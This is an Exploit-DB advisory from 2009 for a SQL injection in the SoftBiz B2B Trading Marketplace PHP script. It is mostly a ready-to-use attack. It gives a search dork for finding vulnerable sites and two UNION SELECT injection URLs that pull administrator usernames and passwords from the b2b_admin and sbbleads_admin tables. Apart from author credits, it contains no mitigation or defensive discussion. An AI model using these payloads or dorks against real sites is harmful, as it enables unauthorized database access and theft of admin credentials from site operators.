SoftBiz B2B trading Marketplace Script - SQL Injection

EDB-ID:

10656


Platform:

PHP

Published:

2009-12-25

[+]  B2B Trading Marketplace SQL Injection Vulnerability

[+]  Software : B2B Trading Marketplace Script
[+]  Author   : AnGrY BoY
[+]  Contact  : h4kurd@hotmail.com & h4kurd@yahoo.com
[+]  Home     : http://www.kurd-security.com    http://www.h4kurd.com
=====================================================================================


[+]  Dork     : cat_sell.php?cid=  or  selloffers.php?cid=


[+]expolit:
                                      
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--	

or 
                            
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--


[+] example
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members